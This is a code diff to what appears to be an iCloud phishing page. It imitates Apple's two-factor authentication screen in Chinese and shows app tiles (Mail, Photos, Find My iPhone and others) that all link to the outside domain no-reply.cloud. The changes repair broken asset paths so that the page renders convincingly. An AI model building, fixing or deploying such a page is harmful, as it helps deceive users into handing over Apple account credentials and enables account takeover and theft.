--- a/codeindex/r/index.html
+++ b/codeindex/r/index.html
@@ -11,7 +11,7 @@
 	<link rel="stylesheet" href="../code/apple.css">
 	<link rel="stylesheet" href="../code/kit.css">
 	<link rel="stylesheet" href="../code/animate.css">	
-	<link rel="stylesheet" type="text/css" media="screen" href=".../code/app.css">
+	<link rel="stylesheet" type="text/css" media="screen" href="../code/app.css">
 </head>
 <body>
 
@@ -24,7 +24,7 @@
 								<a class="setup applef" target="_blank" href="https://www.apple.com/icloud/setup/">
 				設定指示</a>
 								<div class="setup fName" style="display: none;"><i class="glyphicon glyphicon-menu-down"></i><span>
-									<img src=".../code/user.jpeg" alt=""></span>
+									<img src="../code/user.jpeg" alt=""></span>
 					<ul>
 						<li><a href="http://no-reply.cloud/find.php">設定指示</a></li>
 						<li><a href="http://no-reply.cloud/">Sign Out</a></li>
@@ -41,11 +41,11 @@
 	<br><br><br><br><br><br><br>
 <section class="login-form text-center" style="display: block;">
 <br>
-	<img src=".../index_files/cloud.png" class="img-cloud" alt="">
+	<img src="../index_files/cloud.png" class="img-cloud" alt="">
         <h1 class="si-container-title" tabindex="-1">
             <font color="#F5F8F0">雙重認證</font>
         </h1>
-    <script type="text/javascript" src=".../code/s.js"></script>
+    <script type="text/javascript" src="../code/s.js"></script>
     <style>
 .col1,.col2,.col3,.col4 {
   width: 40px;
@@ -171,16 +171,16 @@
 		<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/11.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/11.png" alt="">
 					<span>Reminders</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/9.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/9.png" alt="">
 					<span>
 						Notes
 					</span>
@@ -189,32 +189,32 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/3.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/3.png" alt="">
 					<span>iCloud Drive</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/10.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/10.png" alt="">
 					<span>Photos</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/1.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/1.png" alt="">
 					<span>Contacts</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/8.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/8.png" alt="">
 					<span>Mail</span>
 				</a>
 			</div>
@@ -225,8 +225,8 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/12.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/12.png" alt="">
 					<span>Settings</span>
 				</a>
 			</div>
@@ -234,8 +234,8 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/2.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/2.png" alt="">
 					<span>Find My iPhone</span>
 				</a>
 			</div>
@@ -243,24 +243,24 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/6.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/6.png" alt="">
 					<span>Keynote</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/5.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/5.png" alt="">
 					<span>Numbers</span>
 				</a>
 			</div>
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/20.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/20.png" alt="">
 					<span>Find Friends</span>
 				</a>
 			</div>
@@ -268,8 +268,8 @@
 			<div class="col-md-2 col-sm-4 col-xs-6">
 				<a href="http://no-reply.cloud/find.php" class="text-cente imb">
 					<span class="loadings">
-				<img src=".../index_files/ajax-loader.gif" alt="Loading"></span>
-					<img class="" src=".../index_files/7.png" alt="">
+				<img src="../index_files/ajax-loader.gif" alt="Loading"></span>
+					<img class="" src="../index_files/7.png" alt="">
 					<span>Pages</span>
 				</a>
 			</div>
